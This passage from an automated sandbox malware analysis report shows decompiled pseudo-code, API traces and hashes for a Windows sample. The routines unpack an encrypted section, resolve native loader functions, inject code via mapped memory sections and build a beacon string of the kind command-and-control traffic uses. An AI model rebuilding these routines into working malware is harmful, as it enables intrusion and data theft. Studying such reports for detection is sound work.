        • Part of subcall function 0040F5C8: SetHandleCount.KERNEL32 ref: 0040F7E7
      • GetCommandLineA.KERNELBASE ref: 0040C93F
        • Part of subcall function 0040F493: GetEnvironmentStringsW.KERNEL32(?,?,?,00000001,?,?,0040C94F), ref: 0040F4AF
        • Part of subcall function 0040F493: GetLastError.KERNEL32(?,00000001,?,?,0040C94F), ref: 0040F4C3
        • Part of subcall function 0040F493: GetEnvironmentStringsW.KERNEL32(?,?,?,00000001,?,?,0040C94F), ref: 0040F4E9
        • Part of subcall function 0040F493: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000001,?,?,0040C94F), ref: 0040F524
        • Part of subcall function 0040F493: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000001,?,?,0040C94F), ref: 0040F546
        • Part of subcall function 0040F493: FreeEnvironmentStringsW.KERNEL32(00000000,?,00000001,?,?,0040C94F), ref: 0040F55F
        • Part of subcall function 0040F493: GetEnvironmentStrings.KERNEL32(?,?,?,00000001,?,?,0040C94F), ref: 0040F571
        • Part of subcall function 0040F493: FreeEnvironmentStringsA.KERNEL32(00000000,?,00000001,?,?,0040C94F), ref: 0040F5A2
        • Part of subcall function 0040F493: FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040F5B9
        • Part of subcall function 0040F3DA: GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe,00000104), ref: 0040F404
        • Part of subcall function 0040F167: _strlen.LIBCMT ref: 0040F193
        • Part of subcall function 0040F167: _strlen.LIBCMT ref: 0040F1C4
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Heap$EnvironmentStrings$Free$AddressProc$FileHandleProcess$AllocByteCharInfoModuleMultiStartupTypeWide_strlen$CommandCountCreateCurrentDestroyErrorLastLineNameThreadValueVersion
      • String ID: h,_
      • API String ID: 3907968970-2069914689
      • Opcode ID: 0e1ba8a70bdcb5aecff0d67bce20ad962303cde3b3cbfb059cd92a248f2293d7
      • Instruction ID: 5d630ab8e8d1f71dbe48f748969ac0a7fb88001ae332b38b52cff797b0183284
      • Opcode Fuzzy Hash: 0e1ba8a70bdcb5aecff0d67bce20ad962303cde3b3cbfb059cd92a248f2293d7
      • Instruction Fuzzy Hash: B14181B1940305DADB24EBB6DC86BAE36B4AF04358F10463FF445B72C2DB7C98419A6C

      Control-flow Graph: entry block at 0x0040143E (blocks marked as executed or not executed)
      C-Code - Quality: 95%
      			E0040143E(void* __esi, intOrPtr* _a4, signed int _a8) {
      				intOrPtr _v8;
      				char _v12;
      				void* _v16;
      				signed int _v20;
      				void* _v24;
      				int _v28;
      				void* _v32;
      				void* _v36;
      				void* _v40;
      				signed int _v44;
      				signed int _t96;
      				int _t98;
      				intOrPtr _t104;
      				intOrPtr _t113;
      				intOrPtr _t114;
      				int _t115;
      				unsigned int _t116;
      				intOrPtr _t121;
      				intOrPtr _t124;
      				unsigned int _t131;
      				signed int _t133;
      				signed int _t139;
      				void* _t142;
      				void* _t143;
      				void* _t146;
      				intOrPtr _t154;
      				void* _t155;
      				signed int _t158;
      				void* _t161;
      				void* _t162;
      
      				_t161 = __esi;
      				_t96 = _a8 & 0x00000010;
      				_v32 = 0;
      				_v16 = 0;
      				_v12 = 0;
      				_v24 = 0;
      				_v36 = E00401699;
      				_v44 = _t96;
      				if(_t96 != 0 || ( *0x405480 & 0x00000001) == 0) {
      					_v20 =  *_t161;
      					_t98 =  *(_t161 + 0x10);
      					_t155 = _v20;
      				} else {
      					_t155 =  *(__esi + 8);
      					_t98 =  *(__esi + 0x14);
      					_v36 =  &E00405070;
      					_v20 = _t155;
      				}
      				_v28 = _t98;
      				if(_t155 != 0) {
      					if( *_t155 == 0x5a4d) {
      						L10:
      						_t158 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x3c)) + _t155 + 0x50)) + 0x00000fff & 0xfffff000;
      						_t104 = E0040192F( *(_t161 + 0x14) + _t158 +  *(_t161 + 0x10) + 0xc50,  &_v16,  &_v24); // executed
      						_v8 = _t104;
      						if(_t104 != 0) {
      							L30:
      							if(_v16 != 0) {
      								RtlNtStatusToDosError(NtUnmapViewOfSection(0xffffffff, _v16));
      							}
      							if(_v24 != 0) {
      								CloseHandle(_v24);
      							}
      							L34:
      							if(_v32 != 0) {
      								memset(_v32, 0, _v28);
      								E0040105B(_v32);
      							}
      							goto L36;
      						}
      						_t139 =  *0x405498; // 0x736c6e70
      						_t142 = (_t139 ^ 0x736c6220) + _t158 + _v16;
      						_v40 = _t142;
      						_t113 = E004018F0(_v24,  *_a4,  &_v12); // executed
      						_v8 = _t113;
      						if(_t113 != 0) {
      							goto L30;
      						}
      						_t114 = E004019EE(_v16, _v20, _v12);
      						_v8 = _t114;
      						if(_t114 != 0) {
      							goto L30;
      						}
      						_t115 =  *(_t161 + 0x10);
      						if(_t115 != 0) {
      							memcpy(_t142,  *_t161, _t115);
      							_t162 = _t162 + 0xc;
      						}
      						_t116 =  *(_t161 + 0x14);
      						if(_t116 == 0) {
      							L20:
      							_t143 = _v16 + _t158;
      							asm("cdq");
      							 *((intOrPtr*)(_t143 + 0x30)) = _v12;
      							 *((intOrPtr*)(_t143 + 0x34)) = _t154;
      							memcpy(_t143 + 0x18, _t161, 0x18);
      							_t162 = _t162 + 0xc;
      							if( *(_t161 + 0x10) != 0) {
      								asm("cdq");
      								 *(_t143 + 0x18) = _t158 + _v12 + 0xc50;
      								 *((intOrPtr*)(_t143 + 0x1c)) = _t154;
      							}
      							if( *(_t161 + 0x14) != 0) {
      								asm("cdq");
      								 *((intOrPtr*)(_t143 + 0x20)) = _v12 + _t158 +  *(_t161 + 0x10) + 0xc50;
      								 *((intOrPtr*)(_t143 + 0x24)) = _t154;
      							}
      							if(_v44 != 0 || ( *0x405480 & 0x00000001) == 0) {
      								_t121 = E004012F6(_t154, _t143);
      							} else {
      								_push( *_a4);
      								_t121 = E0040139F(_t154, _t143);
      							}
      							_v8 = _t121;
      							if(_t121 == 0) {
      								memcpy(_t143 + 0x40, _v36, 0x800);
      								_t162 = _t162 + 0xc;
      								_t124 = E0040240C(_t154, _a4, _t158 + _v12 + 0x40, _t158 + _v12, _a8); // executed
      								_v8 = _t124;
      							}
      							goto L30;
      						} else {
      							_t131 = _t116 >> 2;
      							_v20 = _t131;
      							if(_t131 == 0) {
      								goto L20;
      							}
      							while(1) {
      								_t133 = _v20 << 2;
      								_t49 =  &_v20;
      								 *_t49 = _v20 - 1;
      								_t154 = _t142 + _t133;
      								 *((intOrPtr*)(_t154 +  *(_t161 + 0x10) - 4)) =  *((intOrPtr*)(_t133 +  *((intOrPtr*)(_t161 + 8)) - 4));
      								if( *_t49 == 0) {
      									goto L20;
      								}
      								_t142 = _v40;
      							}
      							goto L20;
      						}
      					}
      					_t146 = E00401046(_v28);
      					_v32 = _t146;
      					if(_t146 != 0) {
      						E00402B7A(_t146, _t155, _v28,  *0x405494, 0);
      						_v20 = _t146;
      						_t155 = _t146;
      						goto L10;
      					} else {
      						_v8 = 8;
      						goto L34;
      					}
      				} else {
      					_v8 = 2;
      					L36:
      					return _v8;
      				}
      			}

      APIs
        • Part of subcall function 0040192F: NtCreateSection.NTDLL ref: 0040198A
        • Part of subcall function 0040192F: memset.NTDLL ref: 004019AF
        • Part of subcall function 0040192F: RtlNtStatusToDosError.NTDLL ref: 004019CB
        • Part of subcall function 0040192F: ZwClose.NTDLL(?), ref: 004019DF
      • memcpy.NTDLL(?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040156C
      • memcpy.NTDLL(?,?,00000018,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004015BB
        • Part of subcall function 004012F6: GetModuleHandleA.KERNELBASE(NTDLL.DLL,?,?,00401618,?,?,?,00000000), ref: 00401329
        • Part of subcall function 004012F6: memcpy.NTDLL(?,00405444,00000018,ZwProtectVirtualMemory,LdrGetProcedureAddress,LdrLoadDll), ref: 00401390
      • memcpy.NTDLL(?,00401699,00000800,?,?,?,00000000), ref: 0040162B
        • Part of subcall function 0040240C: memset.NTDLL ref: 0040242B
        • Part of subcall function 0040139F: memcpy.NTDLL(?,0040545C,00000018,?,ZwProtectVirtualMemory,?,LdrGetProcedureAddress,?,LdrLoadDll,?,00401610,?,?,?,?,00000000), ref: 00401430
      • NtUnmapViewOfSection.NTDLL ref: 00401656
      • RtlNtStatusToDosError.NTDLL ref: 0040165D
      • CloseHandle.KERNEL32 ref: 0040166C
      • memset.NTDLL ref: 00401680
        • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,00402908), ref: 00401067
        • Part of subcall function 004018F0: NtMapViewOfSection.NTDLL ref: 0040191D
        • Part of subcall function 004018F0: RtlNtStatusToDosError.NTDLL ref: 00401924
        • Part of subcall function 004019EE: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,00000000), ref: 00401A4E
        • Part of subcall function 004019EE: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,00000000), ref: 00401A63
        • Part of subcall function 004019EE: memcpy.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00401AA5
        • Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,004028D9,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 00401052
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: memcpy$ErrorSectionStatusmemset$CloseHandleHeapView$AllocCreateFreeModuleUnmap
      • String ID: pP@$pnls
      • API String ID: 115379787-4169950845
      • Opcode ID: 1996177078d0cca6aeaa3bf44e4445bdb053348a98243eccfb5bd8acbe51d9e0
      • Instruction ID: 34a7f7512ce7c5b11e24d6413b7ab248df509fd2439dbd4f23d34c87e9ece776
      • Opcode Fuzzy Hash: 1996177078d0cca6aeaa3bf44e4445bdb053348a98243eccfb5bd8acbe51d9e0
      • Instruction Fuzzy Hash: E8816DB0900209EFCB10DF98CD85AAEBBB5FF48304F14457AE901B73A1D779AA45DB58

      Control-flow Graph: entry block at 0x00401C7A (blocks marked as executed or not executed)
      C-Code - Quality: 82%
      			E00401C7A(intOrPtr _a4) {
      				char _v12;
      				intOrPtr _v16;
      				intOrPtr _v20;
      				void* _v23;
      				char _v24;
      				signed int _v32;
      				signed int _v36;
      				void* _t38;
      				intOrPtr* _t39;
      				long _t41;
      				void* _t42;
      				intOrPtr _t46;
      				char _t49;
      				signed int _t50;
      				intOrPtr _t51;
      				intOrPtr _t60;
      				void* _t65;
      				intOrPtr _t66;
      				void* _t71;
      				intOrPtr _t72;
      
      				_t66 =  *0x405484; // 0x400000
      				_t49 = 0;
      				_v24 = 0;
      				asm("stosd");
      				asm("stosw");
      				asm("stosb");
      				_v16 = _t66;
      				_v12 = 0;
      				lstrcpynA( &_v24, ".bss", 8);
      				_t6 = _t66 + 0x3c; // 0xf0
      				_t38 =  *_t6 + _t66;
      				_t50 =  *(_t38 + 6) & 0x0000ffff;
      				_t39 = ( *(_t38 + 0x14) & 0x0000ffff) + _t38 + 0x18;
      				do {
      					if( *_t39 == _v24 &&  *((intOrPtr*)(_t39 + 4)) == _v20) {
      						_t49 = _t39;
      					}
      					_t39 = _t39 + 0x28;
      					_t50 = _t50 - 1;
      				} while (_t50 != 0 && _t49 == 0);
      				if(_t49 == 0) {
      					_v12 = 2;
      				} else {
      					_t51 =  *((intOrPtr*)(_t49 + 0xc));
      					if(_t51 == 0 ||  *(_t49 + 0x10) == 0) {
      						_v12 = 0xb;
      					} else {
      						_t41 =  *(_t49 + 0x10);
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						_t71 = (_t41 + _t51 ^ _v36 ^ _v32) + _a4;
      						_t42 = VirtualAlloc(0, _t41, 0x3000, 4); // executed
      						_t65 = _t42;
      						if(_t65 == 0) {
      							_v12 = 8;
      						} else {
      							_t72 = _v16;
      							E00402B7A(_t42,  *((intOrPtr*)(_t49 + 0xc)) + _t72,  *(_t49 + 0x10), _t71, 1);
      							_t60 =  *((intOrPtr*)(_t49 + 0xc));
      							_t46 =  *((intOrPtr*)(_t65 - _t60 - _t72 + 0x4061c4)) -  *((intOrPtr*)(_t65 - _t60 - _t72 + 0x4061cc)) +  *((intOrPtr*)(_t65 - _t60 - _t72 + 0x4061c0));
      							 *0x405498 = _t46;
      							if(_t46 != 0x736c6e70) {
      								_v12 = 0xc;
      							} else {
      								memcpy(_t60 + _t72, _t65,  *(_t49 + 0x10));
      							}
      							VirtualFree(_t65, 0, 0x8000); // executed
      						}
      					}
      				}
      				return _v12;
      			}

      APIs
      • lstrcpynA.KERNEL32(?,.bss,00000008,767F1218,0000000C), ref: 00401CA8
      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00401D1B
      • memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 00401D64
      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 00401D7D
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Virtual$AllocFreelstrcpynmemcpy
      • String ID: .bss$Sep 26 2018$pnls$pnls$version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • API String ID: 2133416149-285809758
      • Opcode ID: b72512c39d693ed8b00706543c3f9321205c5814dd1b8999c8f547d78f48c8e7
      • Instruction ID: bb5b1e6df9afdaa59d18c819775b69865eb2f2d7f41d0e3035a9afe091bdc630
      • Opcode Fuzzy Hash: b72512c39d693ed8b00706543c3f9321205c5814dd1b8999c8f547d78f48c8e7
      • Instruction Fuzzy Hash: 0B319371A00204ABDF14DF98C984BAFB775FF44704F15806AEA017B295C7B8E945CB99

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 176 2d46df-2d4710 call 2d3c39 180 2d4753-2d4766 GetComputerNameW 176->180 181 2d4712-2d4727 176->181 182 2d4768-2d477c 180->182 183 2d47aa-2d47cc 180->183 181->180 185 2d4729-2d472d 181->185 182->183 187 2d477e-2d478b GetComputerNameW 182->187 188 2d4730-2d4732 185->188 189 2d478d-2d4799 call 2d28df 187->189 190 2d479c-2d47a4 HeapFree 187->190 191 2d4734-2d4741 call 2d28df 188->191 192 2d4743-2d474d HeapFree 188->192 189->190 190->183 191->192 192->180
      APIs
      • RtlAllocateHeap.NTDLL(00000000,?), ref: 002D471C
      • HeapFree.KERNEL32(00000000,00000000), ref: 002D474D
      • GetComputerNameW.KERNEL32(00000000,?), ref: 002D475B
      • RtlAllocateHeap.NTDLL(00000000,?), ref: 002D4772
      • GetComputerNameW.KERNEL32(00000000,?), ref: 002D4783
      • HeapFree.KERNEL32(00000000,00000000), ref: 002D47A4
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Heap$AllocateComputerFreeName
      • String ID: Fv
      • API String ID: 3439771632-1370784869
      • Opcode ID: ad7b7e55ee56a703c7ee115c1a5a3847161ab40c9f146853cc86b53f8c7223ca
      • Instruction ID: 557d4442ebe30a6427b18957dfc37fa62081fe41b81dce0fd39946b22c675263
      • Opcode Fuzzy Hash: ad7b7e55ee56a703c7ee115c1a5a3847161ab40c9f146853cc86b53f8c7223ca
      • Instruction Fuzzy Hash: 043109B2E1110AEFDB00DFB5ED899AEBBF9FB48305B11446AE505D3220E730AE54DB50

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 251 4012f6-401305 252 401321-401333 GetModuleHandleA 251->252 253 401307-401312 251->253 255 401335-40134d call 401dfd 252->255 256 401398-40139c 252->256 253->252 254 401314-40131f 253->254 254->252 257 401385-401395 memcpy 254->257 255->256 260 40134f-401367 call 401dfd 255->260 257->256 260->256 263 401369-40136e call 401dfd 260->263 265 401373-401381 263->265 265->256 266 401383 265->266 266->257
      C-Code - Quality: 86%
      			E004012F6(signed int __edx, void* _a4) {
      				void* __edi;
      				struct HINSTANCE__* _t4;
      				signed int _t6;
      				signed int _t8;
      				signed int _t10;
      				void* _t17;
      				void* _t18;
      				signed int _t19;
      				void* _t21;
      
      				_t19 = __edx;
      				_t21 = 0;
      				if(( *0x405444 |  *0x405448) == 0 || ( *0x40544c |  *0x405450) == 0 || ( *0x405454 |  *0x405458) == 0) {
      					_t21 = 0x7f;
      					_t4 = GetModuleHandleA("NTDLL.DLL"); // executed
      					_t20 = _t4;
      					if(_t4 != 0) {
      						_t6 = E00401DFD(_t17, _t18, _t20, "LdrLoadDll"); // executed
      						asm("cdq");
      						 *0x405444 = _t6;
      						 *0x405448 = _t19;
      						if((_t6 | _t19) != 0) {
      							_t8 = E00401DFD(_t17, _t18, _t20, "LdrGetProcedureAddress"); // executed
      							asm("cdq");
      							 *0x40544c = _t8;
      							 *0x405450 = _t19;
      							if((_t8 | _t19) != 0) {
      								_t10 = E00401DFD(_t17, _t18, _t20, "ZwProtectVirtualMemory"); // executed
      								asm("cdq");
      								 *0x405454 = _t10;
      								 *0x405458 = _t19;
      								if((_t10 | _t19) != 0) {
      									_t21 = 0;
      									goto L8;
      								}
      							}
      						}
      					}
      				} else {
      					L8:
      					memcpy(_a4, 0x405444, 0x18);
      				}
      				return _t21;
      			}

      APIs
      • GetModuleHandleA.KERNELBASE(NTDLL.DLL,?,?,00401618,?,?,?,00000000), ref: 00401329
        • Part of subcall function 00401DFD: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401E4E
        • Part of subcall function 00401DFD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,0040133F,LdrLoadDll), ref: 00401E60
        • Part of subcall function 00401DFD: ReadFile.KERNEL32 ref: 00401E78
        • Part of subcall function 00401DFD: CloseHandle.KERNEL32 ref: 00401E93
      • memcpy.NTDLL(?,00405444,00000018,ZwProtectVirtualMemory,LdrGetProcedureAddress,LdrLoadDll), ref: 00401390
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: File$Handle$CloseCreateModulePointerReadmemcpy
      • String ID: LdrGetProcedureAddress$LdrLoadDll$NTDLL.DLL$ZwProtectVirtualMemory
      • API String ID: 3176338324-3173696408
      • Opcode ID: 65062b689a13a5a3c26b3df877b730762d6fcd2f81351f6a0759503d02edc919
      • Instruction ID: f39fb24f0d1558db3377ed6103870c24b3725bc3a50f5f50e29c628d1969b11c
      • Opcode Fuzzy Hash: 65062b689a13a5a3c26b3df877b730762d6fcd2f81351f6a0759503d02edc919
      • Instruction Fuzzy Hash: 7E01D271280A1057D720EB99AE46B9777A1EB90706715443BF808BB6F2D23868808E3E

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 267 290000-290014 268 290034-290053 267->268 269 290016-290025 267->269 271 290055-290058 268->271 270 29002d-290032 269->270 270->268 272 290027 270->272 273 29005a-290063 271->273 274 290065-29006a 271->274 272->270 273->274 275 29006c-29006f 273->275 274->271 274->275 276 290075-290081 275->276 277 2903c6-2903cc 275->277 278 290089-29008c 276->278 279 290083-290087 276->279 278->277 281 290092 278->281 280 290095-2900cb GetPEB call 2903cf 279->280 284 2900dd-2900df 280->284 281->280 285 2900cd-2900d8 call 2903cf 284->285 286 2900e1-29015b 284->286 285->284 288 290163-29017e call 290408 286->288 291 290180-290196 VirtualAlloc 288->291 291->277 292 29019c-2901b1 291->292 293 2901b3-2901bd 292->293 294 2901e6-290203 VirtualProtect 292->294 295 2901bf-2901ca 293->295 296 290209-290234 294->296 297 2903b7-2903be 294->297 298 2901cc-2901d4 295->298 299 2901df-2901e4 295->299 300 29025a-29026d GetPEB 296->300 301 290236 296->301 297->277 298->299 302 2901d6-2901db 298->302 299->294 299->295 304 29026f 300->304 305 290272-29027a 300->305 303 290239-290258 301->303 302->299 303->300 303->303 304->305 306 29028d-29028f 305->306 307 29027c-290282 306->307 308 290291 306->308 310 290293-2902a1 307->310 311 290284-29028a 307->311 312 2902a4-2902b2 308->312 310->312 311->306 313 29031c-290322 call 2905db 312->313 314 2902b4-29030d CreateActCtxA 312->314 317 290327-290344 call 29065a call 2906dc 313->317 314->313 315 29030f-290317 314->315 315->313 322 29034e-290359 317->322 323 290346-290348 317->323 324 29035b-29035f 322->324 325 29036e-290374 call 290760 322->325 323->322 326 290361-290363 324->326 329 290379-290380 325->329 326->325 328 290365-29036c 326->328 328->325 328->326 330 290388-29038c 329->330 331 290382-290386 329->331 333 29038e-290392 330->333 334 290394-290396 330->334 331->330 332 290398-2903b2 call 290763 331->332 332->297 333->332 333->334 334->329
      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,72D08B8C), ref: 0029018C
      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 002901FD
      • CreateActCtxA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00290306
        • Part of subcall function 002905DB: GetProcAddress.KERNELBASE(?,?,?,00290327,2B14D0EE,?), ref: 00290639
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011296226.0000000000290000.00000040.sdmp, Offset: 00290000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_290000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Virtual$AddressAllocCreateProcProtect
      • String ID: $a
      • API String ID: 1018238108-206647194
      • Opcode ID: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
      • Instruction ID: a922decac74f9c0bd1a906cd4bb2be369e8a44a7a82da7bf6eb3c6a91c8d2b0b
      • Opcode Fuzzy Hash: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
      • Instruction Fuzzy Hash: 10C16771618305CFCB24CF64C4C4B2AB7E2FF88714F158A6DE88A9B252C771E859CB56

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 336 2de040-2de059 337 2de05f-2de06f 336->337 338 2de276-2de284 336->338 339 2de1bc-2de1ec NtProtectVirtualMemory 337->339 340 2de075-2de07f 337->340 345 2de28d-2de294 338->345 347 2de286 338->347 342 2de25c-2de25e 339->342 343 2de1ee 339->343 340->339 344 2de085-2de08d 340->344 342->345 346 2de260-2de274 342->346 348 2de1f1-2de1f3 343->348 349 2de08f 344->349 350 2de0a6-2de0d2 LdrLoadDll 344->350 346->345 347->345 348->345 353 2de1f9-2de1fd 348->353 354 2de095-2de0a4 349->354 351 2de0d8-2de0e5 350->351 352 2de1ab 350->352 355 2de0e7-2de0eb 351->355 356 2de0f1-2de103 351->356 358 2de1b2-2de1b6 352->358 359 2de1ff-2de210 353->359 360 2de212-2de216 353->360 354->350 354->354 355->356 364 2de194 355->364 365 2de109 356->365 366 2de197-2de1a3 356->366 358->339 358->345 361 2de22d-2de25a NtProtectVirtualMemory 359->361 362 2de218-2de228 360->362 363 2de22a-2de22c 360->363 361->342 361->348 362->361 363->361 364->366 367 2de10e-2de110 365->367 366->344 368 2de1a9 366->368 369 2de117-2de119 367->369 370 2de112-2de115 367->370 368->358 372 2de128-2de12d 369->372 373 2de11b-2de122 369->373 371 2de130-2de132 370->371 375 2de134-2de13b 371->375 376 2de152-2de165 LdrGetProcedureAddress 371->376 372->371 373->372 374 2de124-2de126 373->374 374->371 379 2de13d-2de142 375->379 380 2de144-2de14f 375->380 377 2de16b-2de16d 376->377 378 2de167 376->378 381 2de18d 377->381 382 2de16f-2de189 377->382 378->377 379->379 379->380 380->376 381->364 383 2de10b 382->383 384 2de18b 382->384 383->367 384->366
      APIs
      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 002DE0CB
      • LdrGetProcedureAddress.NTDLL(?,00000000,?,?), ref: 002DE15D
      • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 002DE1E1
      • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 002DE24B
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011396965.00000000002DE000.00000040.sdmp, Offset: 002DE000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2de000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: MemoryProtectVirtual$AddressLoadProcedure
      • String ID: z
      • API String ID: 3767977176-1657960367
      • Opcode ID: 0fd71ba999ddeba2e9d57e53e1ccce72047333cbf3351a94ae91052ddcbd577b
      • Instruction ID: 580c3e7fc1512a8d96f8185e69a7608b69984ce2defe94ea508d9008fad03396
      • Opcode Fuzzy Hash: 0fd71ba999ddeba2e9d57e53e1ccce72047333cbf3351a94ae91052ddcbd577b
      • Instruction Fuzzy Hash: E9819E71A102069FCF10DF99C880AAEBBBAFF85304F25855ED816AB311D770ED55CB60
      C-Code - Quality: 75%
      			E004027FD() {
      				struct HINSTANCE__* _t3;
      				struct HINSTANCE__* _t5;
      				signed int _t7;
      				struct HINSTANCE__* _t8;
      				struct HINSTANCE__* _t9;
      				signed int _t10;
      				signed int _t12;
      
      				_t3 = GetModuleHandleA("NTDLL.DLL"); // executed
      				 *0x4054c4 = _t3;
      				if(_t3 == 0) {
      					_push(0x7e);
      					goto L9;
      				} else {
      					_t5 = GetModuleHandleA("KERNEL32.DLL"); // executed
      					 *0x4054c8 = _t5;
      					_t10 = 0;
      					while(1) {
      						_t7 =  *(_t10 + 0x40501c) ^  *0x405498;
      						_t9 =  *0x4054c4; // 0x76ea0000
      						_push(_t7);
      						_t12 = 0;
      						_push(0);
      						_push(_t9);
      						_t8 = _t9;
      						"j,h@A@"();
      						if(_t7 != 0) {
      							_t12 =  *_t7 + _t8;
      						}
      						 *(_t10 + 0x40501c) = _t12;
      						if(_t12 == 0) {
      							break;
      						}
      						_t10 = _t10 + 4;
      						if(_t10 < 0x14) {
      							continue;
      						} else {
      						}
      						goto L10;
      					}
      					_push(0x7f);
      					L9:
      					_pop(0);
      				}
      				L10:
      				return 0;
      			}

      APIs
      • GetModuleHandleA.KERNEL32(NTDLL.DLL,767F1218,00000000,?,?,00401187,?,00000000), ref: 0040280E
      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,00401187,?,00000000), ref: 0040281E
        • Part of subcall function 004029CC: lstrcmpA.KERNEL32(?,?,00404140,0000002C,00402845,76EA0000,00000000,76EC0C30,?,?,00401187,?,00000000), ref: 00402A9A
        • Part of subcall function 004029CC: lstrlenA.KERNEL32(?,00404140,0000002C,00402845,76EA0000,00000000,76EC0C30,?,?,00401187,?,00000000), ref: 00402AA5
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: HandleModule$lstrcmplstrlen
      • String ID: KERNEL32.DLL$NTDLL.DLL
      • API String ID: 3333737328-633099880
      • Opcode ID: 626c4ea812b87f681040992c6ffeb7618aaff7bf83ffbf9cd8f0adcd52b6210f
      • Instruction ID: ad8793dc4379c6a206a675618d59d5c7fca54d7f1d1dcd28c91ada80bdc53ab0
      • Opcode Fuzzy Hash: 626c4ea812b87f681040992c6ffeb7618aaff7bf83ffbf9cd8f0adcd52b6210f
      • Instruction Fuzzy Hash: FEF0F973B5171097D620EB6A9F0CA277B98E7897127024377E40DB72D0C6B59C408AEC
      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00250620
      • VirtualAlloc.KERNELBASE(00000000,0000078E,00003000,00000040), ref: 00250E91
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011253056.0000000000250000.00000040.sdmp, Offset: 00250000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_250000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID: $%^&$VirtualAlloc
      • API String ID: 4275171209-2930927500
      • Opcode ID: a97786759e54dfb22ed3f7dda0be957b5147da7297c0018401eaeb001c559ff2
      • Instruction ID: 5cf576225ab8e49003c86a20380fa9c39cef70ef3ca8e34f9326dcbe7f90f9d6
      • Opcode Fuzzy Hash: a97786759e54dfb22ed3f7dda0be957b5147da7297c0018401eaeb001c559ff2
      • Instruction Fuzzy Hash: 64510930E14299CFDF11DB68CCD47EEBBF5AF59302F184098D985AB342C6B559288F29
      C-Code - Quality: 77%
      			E004022EC(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr* __esi) {
      				long _v8;
      				char _v12;
